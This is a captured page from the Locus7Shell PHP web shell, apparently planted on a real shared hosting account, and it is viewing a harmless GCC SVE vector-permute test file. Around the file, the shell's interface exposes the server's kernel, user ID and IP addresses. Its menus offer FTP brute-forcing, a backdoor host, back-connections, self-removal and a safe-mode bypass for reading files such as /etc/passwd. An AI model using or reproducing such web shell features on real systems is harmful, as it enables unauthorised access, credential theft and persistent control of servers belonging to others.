Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vec_perm_const_1_overrun.c (2.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */
/* { dg-options "-O -msve-vector-bits=256" } */

#include <stdint.h>

typedef int64_t vnx2di __attribute__((vector_size (32)));
typedef int32_t vnx4si __attribute__((vector_size (32)));
typedef int16_t vnx8hi __attribute__((vector_size (32)));
typedef int8_t vnx16qi __attribute__((vector_size (32)));
typedef double vnx2df __attribute__((vector_size (32)));
typedef float vnx4sf __attribute__((vector_size (32)));
typedef _Float16 vnx8hf __attribute__((vector_size (32)));

#define VEC_PERM_CONST_OVERRUN(TYPE, MASK)            \
TYPE vec_perm_overrun_##TYPE (TYPE values1, TYPE values2)    \
{                                \
  return __builtin_shuffle (values1, values2, MASK);        \
}

VEC_PERM_CONST_OVERRUN (vnx2di,  ((vnx2di)  { 4 + (8 * 1), 3 + (8 * 1),
                          6 + (8 * 2), 1 + (8 * 3) }));
VEC_PERM_CONST_OVERRUN (vnx4si,  ((vnx4si)  { 3 + (16 * 3), 9 + (16 * 4),
                          11 + (16 * 5), 12 + (16 * 3),
                          2 + (16 * 2), 4 + (16 * 1),
                          4 + (16 * 2), 2 + (16 * 1) }));
VEC_PERM_CONST_OVERRUN (vnx8hi,  ((vnx8hi)  { 8 + (32 * 3), 27 + (32 * 1),
                          5 + (32 * 3), 4 + (32 * 3),
                          21 + (32 * 1), 12 + (32 * 3),
                          13 + (32 * 3), 0 + (32 * 1),
                          22 + (32 * 2), 1 + (32 * 2),
                          8 + (32 * 2), 9 + (32 * 1),
                          3 + (32 * 2), 24 + (32 * 2),
                          15 + (32 * 1), 1 + (32 * 1) }));
VEC_PERM_CONST_OVERRUN (vnx16qi, ((vnx16qi) { 13 + (64 * 2), 31 + (64 * 2),
                          11 + (64 * 2), 2 + (64 * 1),
                          48 + (64 * 1), 28 + (64 * 2),
                          3 + (64 * 2), 4 + (64 * 3),
                          54 + (64 * 1), 11 + (64 * 2),
                          30 + (64 * 2), 1 + (64 * 1),
                          0 + (64 * 1), 61 + (64 * 2),
                          2 + (64 * 3), 3 + (64 * 2),
                          4 + (64 * 3), 5 + (64 * 3),
                          11 + (64 * 3), 63 + (64 * 1),
                          24 + (64 * 1), 11 + (64 * 3),
                          42 + (64 * 3), 39 + (64 * 2),
                          2 + (64 * 2), 57 + (64 * 3),
                          22 + (64 * 3), 11 + (64 * 2),
                          6 + (64 * 2), 16 + (64 * 2),
                          18 + (64 * 2), 21 + (64 * 3) }));
VEC_PERM_CONST_OVERRUN (vnx2df,  ((vnx2di)  { 7 + (8 * 1), 3 + (8 * 3),
                          2 + (8 * 5), 1 + (8 * 3) }));
VEC_PERM_CONST_OVERRUN (vnx4sf,  ((vnx4si)  { 1 + (16 * 1), 9 + (16 * 2),
                          13 + (16 * 2), 11 + (16 * 3),
                          2 + (16 * 2), 5 + (16 * 2),
                          4 + (16 * 4), 2 + (16 * 3) }));
VEC_PERM_CONST_OVERRUN (vnx8hf,  ((vnx8hi)  { 8 + (32 * 3), 27 + (32 * 1),
                          5 + (32 * 3), 4 + (32 * 3),
                          21 + (32 * 1), 12 + (32 * 3),
                          13 + (32 * 3), 0 + (32 * 1),
                          22 + (32 * 2), 1 + (32 * 2),
                          8 + (32 * 2), 9 + (32 * 1),
                          3 + (32 * 2), 24 + (32 * 2),
                          15 + (32 * 1), 1 + (32 * 1) }));

/* { dg-final { scan-assembler-times {\ttbl\tz[0-9]+\.d, z[0-9]+\.d, z[0-9]+\.d\n} 4 } } */
/* { dg-final { scan-assembler-times {\ttbl\tz[0-9]+\.s, z[0-9]+\.s, z[0-9]+\.s\n} 4 } } */
/* { dg-final { scan-assembler-times {\ttbl\tz[0-9]+\.h, z[0-9]+\.h, z[0-9]+\.h\n} 4 } } */
/* { dg-final { scan-assembler-times {\ttbl\tz[0-9]+\.b, z[0-9]+\.b, z[0-9]+\.b\n} 2 } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--